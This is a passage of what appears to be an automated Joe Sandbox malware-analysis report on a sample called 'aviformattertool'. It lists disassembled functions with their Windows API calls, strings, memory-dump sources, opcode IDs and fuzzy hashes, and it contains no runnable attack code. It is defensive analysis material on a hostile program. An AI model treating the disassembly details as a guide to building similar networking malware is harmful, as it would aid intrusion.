                                                                                                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A1CD66
                                                                                                                                                          • x}, xrefs: 02A1CDB8, 02A1CDE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$x}
                                                                                                                                                          • API String ID: 1953324306-107246763
                                                                                                                                                          • Opcode ID: 4f92a8d73015956d54967d6cc1512773e74dcbed6704d93ae2a8f85fbd377c09
                                                                                                                                                          • Instruction ID: ad83fbf54c5aec78e9f88bb3be8109e55dd1747bfb4311fd5cb24c51b563998d
                                                                                                                                                          • Opcode Fuzzy Hash: 4f92a8d73015956d54967d6cc1512773e74dcbed6704d93ae2a8f85fbd377c09
                                                                                                                                                          • Instruction Fuzzy Hash: A4217E71E812549ADF14EFA8DA54AADFBB9EF44720F04409DE805A7280CF709A48CF51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A11F5B
                                                                                                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02A11FC5
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 02A11FD2
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                                                          • String ID: iocp
                                                                                                                                                          • API String ID: 998023749-976528080
                                                                                                                                                          • Opcode ID: be36a442aaeb1e5273d44c2938ff9dee8da6befb435d15de715cb5ac3fc609ae
                                                                                                                                                          • Instruction ID: b50987a762e7a07ebe6019c003c3c457ea826e9e5b23b4e58b66f8f17642db8f
                                                                                                                                                          • Opcode Fuzzy Hash: be36a442aaeb1e5273d44c2938ff9dee8da6befb435d15de715cb5ac3fc609ae
                                                                                                                                                          • Instruction Fuzzy Hash: 8821C4B1901B449BC7219F6A854455BFBF8EF95720B108A1FE4A683A50DBB0A604CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A23ACC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                            • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
                                                                                                                                                            • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
                                                                                                                                                            • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A23B02
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 02A23B17
                                                                                                                                                            • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 3074076210-2104205924
                                                                                                                                                          • Opcode ID: 12af6f2de27304bd89a8b130a69a0c9eb7d79b13747364fba3a0b65a06884e67
                                                                                                                                                          • Instruction ID: cf76037e71d92be697cf36e8071e0af65e468d57451c340bad5c76ccdf62f078
                                                                                                                                                          • Opcode Fuzzy Hash: 12af6f2de27304bd89a8b130a69a0c9eb7d79b13747364fba3a0b65a06884e67
                                                                                                                                                          • Instruction Fuzzy Hash: AFE0653454022EAADF05FF68CD41AAFB77AAF01310F5046E6EC14A5590EF76DA1CDAD0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A137B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A137B6
                                                                                                                                                          • __localtime64.LIBCMT ref: 02A137C1
                                                                                                                                                            • Part of subcall function 02A22580: __gmtime64_s.LIBCMT ref: 02A22593
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A137D9
                                                                                                                                                            • Part of subcall function 02A22453: std::exception::_Copy_str.LIBCMT ref: 02A2246C
                                                                                                                                                            • Part of subcall function 02A1A4A8: __EH_prolog.LIBCMT ref: 02A1A4AD
                                                                                                                                                            • Part of subcall function 02A1A4A8: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A4BC
                                                                                                                                                            • Part of subcall function 02A1A4A8: __CxxThrowException@8.LIBCMT ref: 02A1A4DB
                                                                                                                                                          Strings
                                                                                                                                                          • could not convert calendar time to UTC time, xrefs: 02A137CE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                                                                          • String ID: could not convert calendar time to UTC time
                                                                                                                                                          • API String ID: 1963798777-2088861013
                                                                                                                                                          • Opcode ID: 530376913a9ce4e77a5cfaff8cc1d8e28bf0786272e3f3b3f9a07f0e896c6dd0
                                                                                                                                                          • Instruction ID: b043b03752d2690c31553916a301e586fd05334940270e98414b098dc72dde60
                                                                                                                                                          • Opcode Fuzzy Hash: 530376913a9ce4e77a5cfaff8cc1d8e28bf0786272e3f3b3f9a07f0e896c6dd0
                                                                                                                                                          • Instruction Fuzzy Hash: DCE06DB1D4020A9BCB01EF98DA147EEB779EF04314F408599E825A6140EF3856198F94
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual$FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 714016831-0
                                                                                                                                                          • Opcode ID: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction ID: 5b32f38fccd05926e46b045a885d3edb078ef3cc8d07faf24e937b41c291ab55
                                                                                                                                                          • Opcode Fuzzy Hash: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction Fuzzy Hash: A73112719447029BE3208F24DD05B22BBA8E74475AF00413AE166BB3D2E778B801874D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A2C369 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AdjustPointer_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1721217611-0
                                                                                                                                                          • Opcode ID: 25ac03582b394c7a240c6be101f736b6775926deb7717aebdf0046bc37aa5e2d
                                                                                                                                                          • Instruction ID: 242d87bc0ec5b959a251bf91df9a05489f6107ce717f223576847b8f04ff56d9
                                                                                                                                                          • Opcode Fuzzy Hash: 25ac03582b394c7a240c6be101f736b6775926deb7717aebdf0046bc37aa5e2d
                                                                                                                                                          • Instruction Fuzzy Hash: 3E41C4362843126AEB299F1CD980B7F77EB9F05734F15001FE846C65D0EF21E588CA51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A212A0 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A2133F
                                                                                                                                                            • Part of subcall function 02A13FDC: __EH_prolog.LIBCMT ref: 02A13FE1
                                                                                                                                                            • Part of subcall function 02A13FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02A13FF3
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A21334
                                                                                                                                                          • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A21380
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A21451
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2825413587-0
                                                                                                                                                          • Opcode ID: 2ef92a665f9590787cc8095520dd0c06e9b690a1df570efc70966d00b32f087e
                                                                                                                                                          • Instruction ID: 5a31aedc35ae870105871ff00c55fbe702710cf67562abd7258a46bae7822408
                                                                                                                                                          • Opcode Fuzzy Hash: 2ef92a665f9590787cc8095520dd0c06e9b690a1df570efc70966d00b32f087e
                                                                                                                                                          • Instruction Fuzzy Hash: 9A51AEB16003559BDF21CF2CC98479AB7E5BF48328F194668F86D97281DF35D809CB91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A2372D Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2782032738-0
                                                                                                                                                          • Opcode ID: a9937a16b76c58c94b28bf15a68adb4139bcec099db716b101ad8f61a228703e
                                                                                                                                                          • Instruction ID: a793c1bd53eafeddaaa882907ea861fd0622f433c35d1441c683035f2317fef9
                                                                                                                                                          • Opcode Fuzzy Hash: a9937a16b76c58c94b28bf15a68adb4139bcec099db716b101ad8f61a228703e
                                                                                                                                                          • Instruction Fuzzy Hash: 1541B275B00726EBDF18CF6DC8D05AE77B6EF42364B1481ADE8158B250DF78D9498B40
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A2FE95 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A2FECB
                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 02A2FEF9
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02A2FF27
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02A2FF5D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                          • Opcode ID: 356e94b0a83ae8b41172d3b9d33a8a7299057d8e5bfd5d9a4ba8a94b721613b4
                                                                                                                                                          • Instruction ID: 490b134e3e87b7be1a8e28b03b78ead517e3595290fdf182c2906aa5bf3b67e6
                                                                                                                                                          • Opcode Fuzzy Hash: 356e94b0a83ae8b41172d3b9d33a8a7299057d8e5bfd5d9a4ba8a94b721613b4
                                                                                                                                                          • Instruction Fuzzy Hash: 9231C031600266AFDB22CF29CC84BAABBB6BF42314F154029E864C7590DF31D859DB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • htons.WS2_32(?), ref: 02A13DA2
                                                                                                                                                            • Part of subcall function 02A13BD3: __EH_prolog.LIBCMT ref: 02A13BD8
                                                                                                                                                            • Part of subcall function 02A13BD3: std::bad_exception::bad_exception.LIBCMT ref: 02A13BED
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A13DB9
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A13DC0
                                                                                                                                                          • htons.WS2_32(?), ref: 02A13DD4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3882411702-0
                                                                                                                                                          • Opcode ID: ad81da06403020c93c07576728c5cabae21e2f7e7bdeba715ea7802c8cf01234
                                                                                                                                                          • Instruction ID: abb039b6397520880b92a74b10820bd71af5a06853d27dca45e4ba95dee276c9
                                                                                                                                                          • Opcode Fuzzy Hash: ad81da06403020c93c07576728c5cabae21e2f7e7bdeba715ea7802c8cf01234
                                                                                                                                                          • Instruction Fuzzy Hash: 2C117076900209EBCF019FA4D985A6AB7B9FF09324B008496FD04DF215EA71DA15CBA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02A123D0
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A123DE
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12401
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A12408
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4018804020-0
                                                                                                                                                          • Opcode ID: d8ab10374c77eed6814e385520b1a56bb68f3b70bde979339e60bde44af80238
                                                                                                                                                          • Instruction ID: 04bbae8ea9d5cc17ab99d2aa4d135a1a5bb684fab6e6687f3b0c5f405b0a962e
                                                                                                                                                          • Opcode Fuzzy Hash: d8ab10374c77eed6814e385520b1a56bb68f3b70bde979339e60bde44af80238
                                                                                                                                                          • Instruction Fuzzy Hash: 9511CE71600304ABDB209F60DD84BA6BBB9FF41714F1044ADF9019B140EFB1E911CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A2C7BB Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                          • Instruction ID: caf149be7139da0827b4a2dd392ea1d97481cbb3fcf25317274e0eb6a4cb28b5
                                                                                                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                          • Instruction Fuzzy Hash: 56017E3244015AFBCF125F88DC418EE3F73BB18364B0A8416FA1859031DB32C5B9AB82
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A124A9
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A124B8
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A124CD
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A124D4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4018804020-0
                                                                                                                                                          • Opcode ID: ef52770a20343820dd0f0e1d01b006c224c711f3b223936bff984fd9dd5f7e73
                                                                                                                                                          • Instruction ID: e2f5249a874b98de452fb488713914c03c924f183bdbd91a398f0210c2a55db0
                                                                                                                                                          • Opcode Fuzzy Hash: ef52770a20343820dd0f0e1d01b006c224c711f3b223936bff984fd9dd5f7e73
                                                                                                                                                          • Instruction Fuzzy Hash: F6F03CB2640209AFDB00DF69ED85F9ABBACFF55710F004419FA05C6141DB71E561CFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A12009
                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 02A12028
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A12037
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A1204E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2456309408-0
                                                                                                                                                          • Opcode ID: f2cdde913cdd7077600d2e5902e00a7a4c3265251bf39ab272238a58904bbccb
                                                                                                                                                          • Instruction ID: 8ad9b3410fbb66a8b553a421be3f13ed999c3cf751950d64768135c5afb1df08
                                                                                                                                                          • Opcode Fuzzy Hash: f2cdde913cdd7077600d2e5902e00a7a4c3265251bf39ab272238a58904bbccb
                                                                                                                                                          • Instruction Fuzzy Hash: C3014B71940718DBC7259F68EE4879AFBB5FF08314F004A5DF84682590DF74AA49CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Event$H_prologSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1765829285-0
                                                                                                                                                          • Opcode ID: 739367ea0e95802ad6a11593a1f674d63eae2ff58aa9e8cec0455c9bc02e7d9b
                                                                                                                                                          • Instruction ID: f7e39e292a5c99cdc8594ebd457bf75b9554b002f4962a585b31437fc4fe8f89
                                                                                                                                                          • Opcode Fuzzy Hash: 739367ea0e95802ad6a11593a1f674d63eae2ff58aa9e8cec0455c9bc02e7d9b
                                                                                                                                                          • Instruction Fuzzy Hash: E1F05475A40110DFCB009FA8DCC9B88BBA4FF0D311F5081A9F619DB290CB759854CF51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A19ED5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog_memmove
                                                                                                                                                          • String ID: &'
                                                                                                                                                          • API String ID: 3529519853-655172784
                                                                                                                                                          • Opcode ID: 5de375e048800d6acafed659ffb5f698bb904df8241e7bfc466474c44ed181dd
                                                                                                                                                          • Instruction ID: 13fc778f09e82e12c78906bde5bb55e7e3762c85c15a9d3de8b58a5cf24986dd
                                                                                                                                                          • Opcode Fuzzy Hash: 5de375e048800d6acafed659ffb5f698bb904df8241e7bfc466474c44ed181dd
                                                                                                                                                          • Instruction Fuzzy Hash: 1A619F71D40219DFDF24DFA4CA91AEEFBBAAF48320F10416AD515AB191DF709A04CF61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Info
                                                                                                                                                          • String ID: $
                                                                                                                                                          • API String ID: 1807457897-3032137957
                                                                                                                                                          • Opcode ID: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction ID: 364ad7a5ee0565adc1119f8b40c781a5b07f5a98c0ad1d73c90734a45d6efa61
                                                                                                                                                          • Opcode Fuzzy Hash: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction Fuzzy Hash: F24126314047586AEB119628DD49BFB7FA8EB02704F1404F6ED46F71D2C2794928EFAB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A195E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02A18353,?,?,00000000), ref: 02A19650
                                                                                                                                                          • getsockname.WS2_32(?,?,?), ref: 02A19666
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastgetsockname
                                                                                                                                                          • String ID: &'
                                                                                                                                                          • API String ID: 566540725-655172784
                                                                                                                                                          • Opcode ID: 6b07edc69d91c0beaf4be00e022edbe51e3762bd6eba0ca047b92df946739319
                                                                                                                                                          • Instruction ID: 83fb3105286a7f1c3262ea00070ef3c573bde0aed005ca6da0a860c8eab12177
                                                                                                                                                          • Opcode Fuzzy Hash: 6b07edc69d91c0beaf4be00e022edbe51e3762bd6eba0ca047b92df946739319
